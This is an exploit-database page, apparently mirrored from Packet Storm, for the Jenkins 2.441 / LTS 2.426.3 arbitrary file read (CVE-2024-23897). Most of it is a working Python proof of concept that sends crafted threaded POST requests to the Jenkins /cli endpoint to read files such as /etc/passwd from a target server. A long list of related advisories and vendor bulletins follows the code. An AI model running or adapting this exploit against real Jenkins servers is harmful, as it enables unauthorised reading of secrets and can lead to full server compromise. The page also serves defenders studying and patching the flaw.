Lucene search
Binganao, github.comPACKETSTORM:176840HistoryJan 29, 2024 - 12:00 a.m.
Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read
2024-01-2900:00:00
binganao, github.com
packetstormsecurity.com
83
jenkins
lts
arbitrary file read
python exploit
security document
6.6 Medium
AI Score
Confidence
Low
`# python poc.py
# [*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
`
Related
githubexploit
githubexploit
Exploit for Vulnerability in Jenkins
2024-02-26 03:07:28
Exploit for Vulnerability in Jenkins
2024-01-29 04:41:53
Exploit for Vulnerability in Jenkins
2024-02-19 02:29:12
hivepro
hivepro
Critical Remote Code Execution Flaws Uncovered in Jenkins
2024-02-01 06:56:33
metasploit
metasploit
Jenkins cli Ampersand Replacement Arbitrary File Read
2024-01-30 22:12:10
zdt
zdt
Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read Exploit
2024-01-29 00:00:00
osv
osv
CVE-2024-23897
2024-01-24 18:15:09
Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
2024-01-24 18:31:02
BIT-jenkins-2024-23897
2024-03-06 10:53:54
packetstorm
packetstorm
Jenkins 2.441 Local File Inclusion
2024-04-15 00:00:00
cve
cve
CVE-2024-23897
2024-01-24 18:15:09
cgr
cgr
CVE-2024-23897 vulnerabilities
2024-05-08 21:08:34
prion
prion
Design/Logic Flaw
2024-01-24 18:15:00
redhatcve
redhatcve
CVE-2024-23897
2024-01-25 20:21:50
veracode
veracode
Arbitrary File Read
2024-01-31 06:55:39
trendmicroblog
trendmicroblog
Jenkins Args4j CVE-2024-23897: Files Exposed, Code at Risk
2024-03-19 00:00:00
alpinelinux
alpinelinux
CVE-2024-23897
2024-01-24 18:15:09
wolfi
wolfi
CVE-2024-23897 vulnerabilities
2024-05-08 21:18:58
github
github
Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
2024-01-24 18:31:02
exploitdb
exploitdb
Jenkins 2.441 - Local File Inclusion
2024-04-15 00:00:00
nessus
nessus
Jenkins LTS < 2.426.3 / Jenkins weekly < 2.442 Multiple Vulnerabilities
2024-01-24 00:00:00
FreeBSD : jenkins -- multiple vulnerabilities (8b03d274-56ca-489e-821a-cf32f07643f0)
2024-01-25 00:00:00
RHEL 8 : jenkins and jenkins-2-plugins (RHSA-2024:0775)
2024-04-29 00:00:00
freebsd
freebsd
jenkins -- multiple vulnerabilities
2024-01-24 00:00:00
kitploit
kitploit
CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner
2024-02-25 11:30:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up 04/05/2024
2024-04-05 18:59:29
thn
thn
Critical Jenkins Vulnerability Exposes Servers to RCE Attacks - Patch ASAP!
2024-01-25 11:57:00
redhat
redhat
(RHSA-2024:0776) Important: jenkins and jenkins-2-plugins security update
2024-02-12 10:18:15
(RHSA-2024:0775) Important: jenkins and jenkins-2-plugins security update
2024-02-12 10:17:47
(RHSA-2024:0778) Important: Jenkins and Jenkins-2-plugins security update
2024-02-12 10:30:15
redos
redos
ROS-20240411-08
2024-04-11 00:00:00